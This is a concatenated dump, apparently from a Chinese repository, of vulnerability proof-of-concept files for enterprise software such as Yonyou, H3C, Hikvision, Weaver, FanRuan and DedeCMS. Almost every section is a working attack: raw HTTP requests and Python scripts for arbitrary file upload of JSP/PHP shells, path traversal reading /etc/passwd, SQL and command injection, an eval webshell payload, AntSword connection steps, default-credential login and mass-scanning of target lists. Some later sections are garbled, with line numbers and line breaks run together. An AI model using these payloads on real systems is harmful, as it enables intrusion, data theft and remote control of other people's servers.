            print('漏洞不存在。')
    except Exception as e:
        pass

if __name__ == '__main__':
    self = input('请输入目标主机IP地址:')
    verify(self)
```

--------------------------------------------------------------------------------
/用友U8 CRM import.php 文件上传漏洞.md:
--------------------------------------------------------------------------------
```
POST /crmtools/tools/import.php?DontCheckLogin=1&issubmit=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye0z8QbHs79gL8vW5


------WebKitFormBoundarye0z8QbHs79gL8vW5
Content-Disposition: form-data; name="xfile"; filename="1.xls"


------WebKitFormBoundarye0z8QbHs79gL8vW5
Content-Disposition: form-data; name="combo"

rce.php
------WebKitFormBoundarye0z8QbHs79gL8vW5--
```

--------------------------------------------------------------------------------
/H3C密码泄露漏洞.md:
--------------------------------------------------------------------------------
```
import requests
import urllib3
from urllib.parse import urlparse

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
payload = '/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg'
invalidkey = "home.asp"
with open('target.txt', 'r') as f:
    for target in f:
        url = target + payload
        # print('target:',url)
        try:
            req = requests.get(url, verify=False)
        except:
            pass
        if req.status_code == 200:
            if invalidkey not in req.text:
                parsed = urlparse(url)
                with open(str(parsed.hostname) + '.' + str(parsed.port) + '.txt', 'w') as w:
                    w.write(req.text)
                    w.close()
                print('[+] Target: ' + target + ' is Vulnerability')
```

--------------------------------------------------------------------------------
/海康卫视综合安防 uploadAllPackage任意文件上传.md:
--------------------------------------------------------------------------------
```
POST /center_install/picUploadService/v1/uploadAllPackage/image HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: */*
Host: 192.168.52.228:8001
Accept-Encoding: gzip, deflate
Connection: close
Token: SElLIGlhL3NmaGNjaTY3WWxWK0Y6UzVCcjg1a2N1dENqVUNIOUM3SE1GamNkN2dnTE1BN1dGTDJldFE0UXFvbz0=
Content-Type: multipart/form-data; boundary=--------------------------553898708333958420021355
Content-Length: 233

----------------------------553898708333958420021355
Content-Disposition: form-data; name="sendfile"; filename="../../../../components/tomcat85linux64.1/webapps/eportal/y4.js"
Content-Type: application/octet-stream

expzhizhuo
----------------------------553898708333958420021355--
```

```
http://ip/portal/ui/login/..;/..;y4.js
```

--------------------------------------------------------------------------------
/万户ezoffice wpsservlet任意文件上传.md:
--------------------------------------------------------------------------------
```python
import requests

def verify(ip):

    url = f'{ip}/defaultroot/platform/portal/layout/check.jsp'

    headers = {
        'Content-Type': 'multipart/form-data',
    }

    payload = '''
--55aeb894de1521afe560c924fad7c6fb
Content-Disposition: form-data; name="NewFile"; filename="check.jsp"

<% out.print("This website has a vulnerability!!!");%>
--55aeb894de1521afe560c924fad7c6fb--
'''

    try:
        response = requests.post(url, headers=headers, data=payload)
        # Print details when verification succeeds
        if response.status_code == 200 :
            print(f"{ip}存在万户ezoffice wpsservlet任意文件上传!!!")
        else:
            print('漏洞不存在。')

    except Exception as e:
        pass

if __name__ == '__main__':
    self = input('请输入目标主机IP地址:')
    verify(self)
```

--------------------------------------------------------------------------------
/用友u8-cloud RegisterServlet SQL注入.md:
--------------------------------------------------------------------------------
```
import requests

def verify(ip):
    url = f'{ip}/servlet/RegisterServlet'
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36',
        'Connection': 'close',
        'Content-Length': '85',
        'Accept': '*/*',
        'Accept-Language': 'en',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept-Encoding': 'gzip',
    }
    payload = '''usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--'''
    try:
        response = requests.post(url, headers=headers, data=payload,verify=False)
        # Print details when verification succeeds
        if response.status_code == 200 :
            print(f"{ip}存在用友u8-cloud RegisterServlet SQL注入漏洞!!!")

    except Exception as e:
        pass


if __name__ == '__main__':
    self = input('请输入目标主机IP地址:')
    verify(self)
```

--------------------------------------------------------------------------------
/锐捷统一上网行为管理与审计系统 static_convert.php 命令执行.md:
--------------------------------------------------------------------------------
```
GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20%20echo%20'abab'%20>>%20/var/www/html/test.txt%0A HTTP/1.1
Host:your-ip
Accept: application/json, text/javascript, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```

POC2

```
GET /view/IPV6/naborTable/static_convert.php?blocks[0]=|echo%20%27%27%20>/var/www/html/rce.php HTTP/1.1
Host:
Accept: application/json, text/javascript, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```

--------------------------------------------------------------------------------
/用友-CRM客户关系管理系统-任意文件上传.md:
--------------------------------------------------------------------------------
```
POST /crmtools/tools/import.php?DontCheckLogin=1&issubmit=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Content-Length: 277
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye0z8QbHs79gL8vW5
Upgrade-Insecure-Requests: 1

------WebKitFormBoundarye0z8QbHs79gL8vW5
Content-Disposition: form-data; name="xfile"; filename="11.xls"


------WebKitFormBoundarye0z8QbHs79gL8vW5
Content-Disposition: form-data; name="combo"

help.php
------WebKitFormBoundarye0z8QbHs79gL8vW5--
```

--------------------------------------------------------------------------------
/用友U8 Cloud linkntb存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
```
GET /yer/html/nodes/linkntb/linkntb.jsp?pageId=linkntb&billId=1%27%29+AND+5846%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%285846%3D5846%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%29--+Astq&djdl=1&rand=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: JSESSIONID=FC1C64E67AE8D02989467988D2FF143A.server; JSESSIONID=5BA15086E03362F38918286E9E0C0E24.server
Upgrade-Insecure-Requests: 1
Priority: u=1
```

--------------------------------------------------------------------------------
/同享TXEHR V15人力管理管理平台DownloadFile存在任意文件下载漏洞.md:
--------------------------------------------------------------------------------
```
POST /Service/DownloadTemplate.asmx HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: ASP.NET_SessionId=f40br0ilcoosnxgllqrmltkd
Upgrade-Insecure-Requests: 1
Priority: u=1
SOAPAction: http://tempuri.org/DownloadFile
Content-Type: text/xml;charset=UTF-8
Host:
Content-Length: 310






../web.config



```

--------------------------------------------------------------------------------
/IP网络广播服务平台存在任意文件上传漏洞.md:
--------------------------------------------------------------------------------
Fofa:icon_hash="-568806419"

```
POST /api/v2/remote-upgrade/upload HTTP/1.1
Host: 127.0.0.1
Content-Length: 197
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytiZYyyKkbwCxtHC1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://127.0.0.1/api/v2/remote-upgrade/upload
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Connection: close

------WebKitFormBoundarytiZYyyKkbwCxtHC1
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg


------WebKitFormBoundarytiZYyyKkbwCxtHC1--
```

--------------------------------------------------------------------------------
/亿赛通数据泄露防护(DLP)系统NoticeAjax接口存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
```
POST /CDGServer3/NoticeAjax;Service HTTP/1.1
Host:
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer:
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Priority: u=0, i
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 98


command=delNotice&noticeId=123';if(select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0: 3'--
```

--------------------------------------------------------------------------------
/海洋CMS后台admin_smtp.php存在远程代码执行漏洞.md:
--------------------------------------------------------------------------------
```
POST /at1fcg/admin_smtp.php?action=set HTTP/1.1
Host: 127.0.0.12
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 192
Origin: http://127.0.0.12
Connection: close
Referer: http://127.0.0.12/at1fcg/admin_smtp.php
Cookie: PHPSESSID=rcejd2jps1jcrv8gdoumqmf71k
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=4

smtpserver=${eval($_POST[1])}&smtpserverport=&smtpusermail=12345%40qq.com&smtpname=%E6%B5%B7%E6%B4%8B%E5%BD%B1%E8%A7%86%E7%BD%91&smtpuser=12345%40qq.com&smtppass=123456789&smtpreg=off&smtppsw=
```

--------------------------------------------------------------------------------
/DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞.md:
--------------------------------------------------------------------------------
```
GET /dede/sys_verifies.php?action=getfiles&refiles[]=123${${print%20`whoami`}} HTTP/1.1
Host: 127.0.0.11
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1%2C5_1%2C6_1; PHPSESSID=89s6bbv2d1unokav5grt4bk2g4; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=10acd9938ef3615d; DedeLoginTime=1720327720; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=c5e6c12f26661f56; _csrf_name_236f0c58=6d608f0ee0d0e0b59410565dfeec6b2b; _csrf_name_236f0c581BH21ANI1AGD297L1FF21LN02BGE1DNG=bc5881b7b91f1bd9
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=1
```

--------------------------------------------------------------------------------
/泛微HrmService存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
```
POST /services/HrmService HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: close
SOAPAction: urn:weaver.hrm.webservice.HrmService.getHrmDepartmentInfo
Content-Type: text/xml;charset=UTF-8
Host:
Content-Length: 427
X-Forwarded-For: 127.0.0.1






gero et

1)AND(db_name()like'ec%'



```

--------------------------------------------------------------------------------
/因酷教育平台RCE(CVE-2024-35570).md:
--------------------------------------------------------------------------------
```
POST /image/gok4?&param=image&fileType=jpg,gif,png,jpeg,jspx&pressText=undefined HTTP/1.1
Host:
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 5 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 6 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 7 | Accept-Encoding: gzip, deflate 8 | Content-Type: multipart/form-data; boundary=---------------------------308436435515370414691526924874 9 | Content-Length: 2853 10 | Origin: http://192.168.3.102:8080 11 | Connection: close 12 | Referer: http://192.168.3.102:8080/admin/website/doUpdateImages/309 13 | Upgrade-Insecure-Requests: 1 14 | Priority: u=4 15 | 16 | -----------------------------308436435515370414691526924874 17 | Content-Disposition: form-data; name="uploadfile"; filename="../../../../2.jspx" 18 | Content-Type: image/jpeg 19 | 20 | 123 21 | -----------------------------308436435515370414691526924874-- 22 | ``` 23 | 24 | -------------------------------------------------------------------------------- /蓝凌EKP存在sys_ui_component远程命令执行漏洞 .md: -------------------------------------------------------------------------------- 1 | ``` 2 | POST/sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1 3 | Host:xx.xx.xx.xx 4 | Accept:application/json, text/javascript, */*; q=0.01 5 | Accept-Encoding:gzip, deflate 6 | Accept-Language:zh-CN,zh;q=0.9,en;q=0.8 7 | Connection:close 8 | Content-Length:401 9 | Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51 10 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X xxx)AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15X-Requested-With: XMLHttpRequest 11 | 12 | ------WebKitFormBoundaryL7ILSpOdIhIIvL51 13 | 14 | Content-Disposition:form-data; name="method" 15 | 16 | replaceExtend 17 | ------WebKitFormBoundaryL7ILSpOdIhIIvL51 18 | Content-Disposition:form-data; name="extendId" 19 | 20 | ../../../../resource/help/km/review/ 21 | ------WebKitFormBoundaryL7ILSpOdIhIIvL51 22 | 
Content-Disposition:form-data; name="folderName" 23 | 24 | ../../../ekp/sys/common 25 | ------WebKitFormBoundaryL7ILSpOdIhIIvL51-- 26 | 27 | /resource/help/kms/knowledge/dataxml.jsp 28 | ``` 29 | 30 | -------------------------------------------------------------------------------- /电信网关 ipping.php 命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | ***\*fofa-qeury:body="a:link{text-decoration:none;color:orange;}"\**** 2 | 3 | 1.获取cookie->默认密码登录->ipping.php接口命令执行得到结果 4 | 5 | ``` 6 | 7 | GET /manager/index.php HTTP/1.1 8 | Host: 9 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 10 | Content-Type: application/x-www-form-urlencoded 11 | Content-Length: 21 12 | 13 | 14 | POST /manager/login.php HTTP/1.1 15 | Host: 16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 17 | Content-Type: application/x-www-form-urlencoded 18 | Content-Length: 21 19 | Cookie: {{phpsessid}} 20 | 21 | Name=admin&Pass=admin 22 | 23 | 24 | POST /manager/ipping.php HTTP/1.1 25 | Host: 26 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 27 | Content-Type: application/x-www-form-urlencoded 28 | Content-Length: 24 29 | Cookie: {{phpsessid}} 30 | 31 | ipaddr=127.0.0.1;echo 237219737; 32 | ``` 33 | 34 | ![image-20240729092933849](电信网关 ipping.php 命令执行漏洞.assets/image-20240729092933849.png) -------------------------------------------------------------------------------- /宏景eHR sdutygetSdutyTree SQL注入.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET 
/w_selfservice/oauthservlet/%2e./.%2e/servlet/sduty/getSdutyTree?param=child&target=1&codesetid=1&codeitemid=1%27+UNION+ALL+SELECT+NULL%2CCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28106%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28119%29%2BCHAR%2885%29%2BCHAR%2873%29%2BCHAR%2887%29%2BCHAR%2899%29%2BCHAR%2875%29%2BCHAR%28116%29%2BCHAR%2872%29%2BCHAR%28113%29%2BCHAR%28104%29%2BCHAR%28107%29%2BCHAR%2889%29%2BCHAR%28115%29%2BCHAR%28108%29%2BCHAR%2873%29%2BCHAR%2884%29%2BCHAR%2869%29%2BCHAR%2873%29%2BCHAR%2875%29%2BCHAR%2883%29%2BCHAR%2898%29%2BCHAR%28116%29%2BCHAR%28120%29%2BCHAR%2889%29%2BCHAR%2884%29%2BCHAR%2882%29%2BCHAR%28120%29%2BCHAR%2884%29%2BCHAR%28116%29%2BCHAR%2888%29%2BCHAR%28112%29%2BCHAR%2887%29%2BCHAR%2873%29%2BCHAR%28109%29%2BCHAR%28104%29%2BCHAR%2887%29%2BCHAR%28102%29%2BCHAR%2897%29%2BCHAR%2877%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%28122%29%2BCHAR%28113%29%2CNULL%2CNULL--+Iprd HTTP/1.1 3 | Host: your-ip 4 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0 5 | ``` 6 | 7 | -------------------------------------------------------------------------------- /H3C-CVM-upload接口前台任意文件上传漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | POST /cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/a.jsp&name=123 HTTP/1.1 3 | Host: your-ip 4 | Content-Range: bytes 0-10/20 5 | Referer: http://your-ip/cas/login 6 | Accept-Encoding: gzip 7 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 8 | 9 | <%out.println("test");%> 10 | ``` 11 | 12 | 13 | 14 | ``` 15 | POST /cas/fileUpload/fd HTTP/1.1 16 | Host: 17 | Accept-Encoding: gzip, deflate 18 | Accept: */* 19 | Connection: close 20 | Content-Type: multipart/form-data; boundary=a4d7586ac9d50625dee11e86fa69bc71 21 | Content-Length: 217 22 | 23 | --a4d7586ac9d50625dee11e86fa69bc71 24 | 
Content-Disposition: form-data; name="token" 25 | 26 | /../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/stc11.jsp 27 | --a4d7586ac9d50625dee11e86fa69bc71 28 | Content-Disposition: form-data; name="file"; filename="123.jsp" 29 | Content-Type: image/png 30 | 31 | <% out.println("215882935");%> 32 | --a4d7586ac9d50625dee11e86fa69bc71-- 33 | ``` 34 | 35 | -------------------------------------------------------------------------------- /启明星辰-天清汉马VPN接口download任意文件读取.md: -------------------------------------------------------------------------------- 1 | ## 测绘 2 | 3 | ``` 4 | icon_hash="-15980305"app="网御星云-VPN" || (body="select_auth_method" && body="select_auth_input") || app="启明星辰-天清汉马VPN" 5 | ``` 6 | 7 | ### POC 8 | 9 | ``` 10 | GET /vpn/user/download/client?ostype=../../../../../../../etc/passwd HTTP/1.1 11 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 12 | Accept-Encoding: gzip, deflate, br, zstd 13 | Accept-Language: zh-CN,zh;q=0.9 14 | Connection: keep-alive 15 | Cookie: VSG_VERIFYCODE_CONF=0-0; VSG_CLIENT_RUNNING=false; VSG_LANGUAGE=zh_CN; VSG_CSRFTOKEN=1ec96cd6acc254fcf9e9cd6d1e85cf23 16 | Host: 17 | Sec-Fetch-Dest: document 18 | Sec-Fetch-Mode: navigate 19 | Sec-Fetch-Site: none 20 | Sec-Fetch-User: ?1 21 | Upgrade-Insecure-Requests: 1 22 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 23 | sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126" 24 | sec-ch-ua-mobile: ?0 25 | sec-ch-ua-platform: "Windows" 26 | ``` 27 | 28 | -------------------------------------------------------------------------------- /帆软未授权命令执行.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET 
/webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2Faaa.jsp%27%20as%20gggggg%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20gggggg.exp2%28data%20text%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20gggggg.exp2%28data%29%20VALUES%20%28x%27247b27272e676574436c61737328292e666f724e616d6528706172616d2e61292e6e6577496e7374616e636528292e676574456e67696e6542794e616d6528276a7327292e6576616c28706172616d2e62297d%27%29%3B'),1,1)} HTTP/1.1 3 | Host: 4 | Cache-Control: max-age=0 5 | Upgrade-Insecure-Requests: 1 6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 7 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 8 | Accept-Encoding: gzip, deflate, br 9 | Accept-Language: zh-CN,zh;q=0.9 10 | Connection: keep-alive 11 | 12 | /webroot/aaa.jsp 13 | ``` 14 | 15 | 蚁剑进行连接,添加get参数?a=javax.script.ScriptEngineManager,密码为b,类型选择JSPJS 16 | -------------------------------------------------------------------------------- /泛微 e-cology9 servicesWorkPlanService 前台SQL注入.md: -------------------------------------------------------------------------------- 1 | ``` 2 | POST /services/WorkPlanService HTTP/1.1 3 | Host: 4 | Content-Length: 380 5 | Cache-Control: max-age=0 6 | Upgrade-Insecure-Requests: 1 7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/120.0.6367.118 Safari/537.36 8 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,i 9 | mage/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 10 | Accept-Encoding: gzip, deflate, br 11 | Accept-Language: zh-CN,zh;q=0.9 12 | SOAPAction: 13 | Content-Type: text/xml;charset=UTF-8 14 | Referer: http://0.0.0.0/services/WorkPlanService 15 | Cookie: 
ecology_JSessionid=bibwzto5sdeg43J9Fz0iu 16 | Connection: close 17 | 18 | 20 | 21 | 22 | 23 | 24 | (SELECT 123 FROM 25 | (SELECT(SLEEP(3-(IF(1=1,0,5)))))NZeo) 26 | 27 | 22 28 | 29 | 30 | 31 | ``` 32 | 33 | -------------------------------------------------------------------------------- /建文工程项目管理软件BusinessManger存在SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | POST /AppInterface/Business/BusinessManger.ashx HTTP/1.1 3 | Host: 4 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 5 | Content-Type: application/x-www-form-urlencoded 6 | Accept-Encoding: gzip 7 | Connection: close 8 | 9 | method=PrjType&content=%27+UNION+ALL+SELECT+NULL%2CCHAR%28113%29%2BCHAR%2898%29%2BCHAR%2898%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28121%29%2BCHAR%2874%29%2BCHAR%28104%29%2BCHAR%2885%29%2BCHAR%2870%29%2BCHAR%28120%29%2BCHAR%2890%29%2BCHAR%2865%29%2BCHAR%28116%29%2BCHAR%2868%29%2BCHAR%2899%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%2875%29%2BCHAR%2875%29%2BCHAR%28109%29%2BCHAR%28117%29%2BCHAR%2881%29%2BCHAR%2897%29%2BCHAR%2884%29%2BCHAR%2870%29%2BCHAR%28118%29%2BCHAR%2874%29%2BCHAR%2890%29%2BCHAR%2880%29%2BCHAR%28101%29%2BCHAR%2868%29%2BCHAR%28119%29%2BCHAR%28113%29%2BCHAR%2885%29%2BCHAR%28122%29%2BCHAR%2875%29%2BCHAR%2878%29%2BCHAR%28112%29%2BCHAR%28115%29%2BCHAR%28103%29%2BCHAR%2866%29%2BCHAR%2868%29%2BCHAR%28105%29%2BCHAR%2873%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28122%29%2BCHAR%28122%29%2BCHAR%28113%29--+tftC 10 | ``` 11 | 12 | -------------------------------------------------------------------------------- /易宝OA ExecuteSqlForSingle SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | ```python 2 | import requests 3 | import concurrent.futures 4 | 5 | def check_vulnerability(target): 6 | 7 | headers = { 8 | "User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", 9 | "Content-Type": 
"application/x-www-form-urlencoded" 10 | } 11 | data = { 12 | "token": "zxh", 13 | "sql": "select substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)", 14 | "strParameters": "" 15 | } 16 | try: 17 | res = requests.post(f"{target}/api/system/ExecuteSqlForSingle", headers=headers,data=data,timeout=5) 18 | if "e10adc3949ba59abbe56e057f20f883e" in res.text and "success" in res.text: 19 | print(f"{target} 漏洞存在") 20 | with open("attack.txt", 'a') as f: 21 | f.write(f"{target}\n") 22 | else: 23 | print(f"{target} 漏洞不存在") 24 | except: 25 | print(f"{target} 访问错误") 26 | 27 | if __name__ == "__main__": 28 | f = open("target.txt", 'r') 29 | targets = f.read().splitlines() 30 | 31 | # 使用线程池并发执行检查漏洞 32 | with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor: 33 | executor.map(check_vulnerability, targets) 34 | ``` 35 | 36 | -------------------------------------------------------------------------------- /创客13星零售商城系统前台任意文件上传漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | POST /Login/shangchuan HTTP/1.1 3 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 4 | Accept-Encoding: gzip, deflate, br, zstd 5 | Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 6 | Cache-Control: max-age=0 7 | Connection: keep-alive 8 | Content-Length: 197 9 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBP56KuZOdlY4nLGg 10 | Host: 127.0.0.1 11 | Origin: http://127.0.0.1 12 | Referer: http://127.0.0.1/Login/shangchuan 13 | Sec-Fetch-Dest: document 14 | Sec-Fetch-Mode: navigate 15 | Sec-Fetch-Site: none 16 | Upgrade-Insecure-Requests: 1 17 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 18 | sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126" 19 | sec-ch-ua-mobile: ?0 20 | 